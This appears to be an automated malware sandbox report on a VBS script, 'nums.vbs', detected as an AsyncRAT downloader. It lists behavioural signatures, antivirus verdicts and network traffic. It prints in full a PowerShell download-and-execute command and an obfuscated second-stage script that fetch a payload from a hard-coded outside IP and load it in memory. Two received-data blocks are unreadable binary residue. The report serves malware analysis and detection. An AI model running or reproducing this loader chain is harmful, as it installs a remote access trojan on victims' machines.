cmdline	powershell -Command "$ax = New-Object Net.WebClient;$bx = $ax.DownloadString('http://88.214.48.26/tpnl98/pik.ps1');[ScriptBlock]::Create($bx).Invoke()"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 28, 2025, 10:36 a.m.	show_type: 0 filepath_r: powershell parameters: -Command "$ax = New-Object Net.WebClient;$bx = $ax.DownloadString('http://88.214.48.26/tpnl98/pik.ps1');[ScriptBlock]::Create($bx).Invoke()" filepath: powershell	1	1	0

File has been identified by 8 AntiVirus engines on VirusTotal as malicious (8 events)

ESET-NOD32	VBS/Pterodo.AOV
TrendMicro-HouseCall	Backdoor.VBS.ASYNCRAT.YXFDXZ
Kaspersky	HEUR:Trojan.Script.Generic
TrendMicro	Backdoor.VBS.ASYNCRAT.YXFDXZ
Google	Detected
Microsoft	TrojanDownloader:VBS/AsyncRAT.IXW!MTB
Tencent	Script.Trojan.Generic.Bujl
alibabacloud	Trojan:Win/Pterodo.APN

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 28, 2025, 10:36 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (3 events)

Data received	HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Wed, 23 Apr 2025 20:39:58 GMT Accept-Ranges: bytes ETag: "d11e1be18fb4db1:0" Server: Microsoft-IIS/10.0 Date: Mon, 28 Apr 2025 06:37:06 GMT Content-Length: 712 function HxRnF-MwVy { Add-Type -AssemblyName System.Net return New-Object System.Net.WebClient } function ZqLpS-KeWd { $dU = @('http', '://', '88', '.', '214', '.', '48', '.', '26', '/tpnl98/', 'ret.exe') return ($dU -join '') } function BlKqD-XoVi { param([string]$eB) $tM = HxRnF-MwVy return $tM.DownloadData($eB) } function JyEzC-QhTf { param([byte[]]$uO) return [System.Reflection.Assembly]::Load($uO) } function VrLnx-TyJp { param([System.Reflection.Assembly]$sV) $aH = $sV.EntryPoint if ($aH) { $aH.Invoke($null, @()) } } $nK = ZqLpS-KeWd $fB = BlKqD-XoVi -eB $nK $gW = JyEzC-QhTf -uO $fB VrLnx-TyJp -sV $gW
Data received	(((( ( ((( ((((((((((((((((((( (!("(#($(%(&('((()((+(,(-(.(/(0(1(2(3(4(5(6(7(8(9(:(;(<(=(>(?(@(A(B(C(D(E(F(G(H(I(J(K(L(M(N(O(P(Q(R(S(T(U(V(W(X(Y(Z([(\(](^(_(`(a(b(c(d(e(f(g(h(i(j(k(l(m(n(o(p(q(r(s(t(u(v(w(x(y(z({(\|(}(~(((((((((((((((((((((((((((((((((( (¡(¢(£(¤(¥(¦(§(¨(©(ª(«(¬((®(¯(°(±(²(³(´(µ(¶(·(¸(¹(º(»(¼(½(¾(¿(À(Á(Â(Ã(Ä(Å(Æ(Ç(È(É(Ê(Ë(Ì(Í(Î(Ï(Ð(Ñ(Ò(Ó(Ô(Õ(Ö(×(Ø(Ù(Ú(Û(Ü(Ý(Þ(ß(à(á(â(ã(ä(å(æ(ç(è(é(ê(ë(ì(í(î(ï(ð(ñ(ò(ó(ô(õ(ö(÷(ø(ù(ú(û(ü(ý(þ(ÿ(((((((((( ( ((( ((((((((((((((((((( (!("(#($(%(&('((()(*(+(,(-(.(/(0(1(2(3(4(5(6(7(8(9(:(;(<(=(>(?(@(A(B(C(D(E(F(G(H(I(J(K(L(M(N(O(P(Q(R(S(T(U(V(W(X(Y(Z([(\(](^(_(`(a(b(c(d(e(f(g(h(i(j(k(l(m(n(o(p(q(r(s(t(u(v(w(x(y(z({(\|(}(~(((((((((((((((((((((((((((((((((( (¡(¢(£(¤(¥(¦(§(¨(©(ª(«(¬((®(¯(°(±(²(³(´(µ(¶*(·
Data received	(¸(¹(º(»(¼(½(¾(¿(À(Á(Â(Ã(Ä(Å(Æ(Ç(È(É(Ê(Ë(Ì(Í(Î(Ï(Ð(Ñ(Ò(Ó(Ô(Õ(Ö(×(Ø(Ù(Ú(Û(Ü(Ý(Þ(ß(à(á(â(ã(ä(å(æ(ç(è(é(ê(ë(ì(í(î(ï(ð(ñ(ò(ó(ô(õ(ö(÷(ø(ù(ú(û(ü(ý(þ(ÿ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( (! (" (# ($ (% (& (' (( () ( (+ (, (- (. (/ (0 (1 (2 (3 (4 (5 (6 (7 (8 (9 (: (; (< (= (> (? (@ (A (B (C (D (E (F (G (H (I (J (K (L (M (N (O (P (Q (R (S (T (U (V (W (X (Y (Z ([ (\ (] (^ (_ (` (a (b (c (d (e (f (g (h (i (j (k (l (m (n (o (p (q (r (s (t (u (v (w (x (y (z ({ (\| (} (~ ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( (¡ (¢ (£ (¤ (¥ (¦ (§ (¨ (© (ª (« (¬ ( (® (¯ (° (± (² (³ (´ (µ (¶ (· (¸ (¹ (º (» (¼ (½ (¾ (¿ (À (Á (Â (Ã (Ä (Å (Æ (Ç (È (É (Ê (Ë (Ì (Í (Î (Ï (Ð (Ñ (Ò (Ó (Ô (Õ (Ö (× (Ø (Ù (Ú (Û (Ü (Ý (Þ *(ß

Poweshell is sending data to a remote host (2 events)

Data sent	GET /tpnl98/pik.ps1 HTTP/1.1 Host: 88.214.48.26 Connection: Keep-Alive
Data sent	GET /tpnl98/ret.exe HTTP/1.1 Host: 88.214.48.26

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 28, 2025, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

88.214.48.26

A potential heapspray has been detected. 58 megabytes was sprayed onto the heap of the powershell.exe process (1 event)

count

938

name

heapspray

process

powershell.exe

total_mb

length

65536

protection

PAGE_READWRITE

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send April 28, 2025, 10:36 a.m.	buffer: GET /tpnl98/pik.ps1 HTTP/1.1 Host: 88.214.48.26 Connection: Keep-Alive socket: 1420 sent: 76	1	76	0
send April 28, 2025, 10:36 a.m.	buffer: GET /tpnl98/ret.exe HTTP/1.1 Host: 88.214.48.26 socket: 1420 sent: 52	1	52	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$ax = New-Object Net.WebClient;$bx = $ax.DownloadString('http://88.214.48.26/tpnl98/pik.ps1');[ScriptBlock]::Create($bx).Invoke()"
parent_process	wscript.exe				martian_process	powershell -Command "$ax = New-Object Net.WebClient;$bx = $ax.DownloadString('http://88.214.48.26/tpnl98/pik.ps1');[ScriptBlock]::Create($bx).Invoke()"

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

nums.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All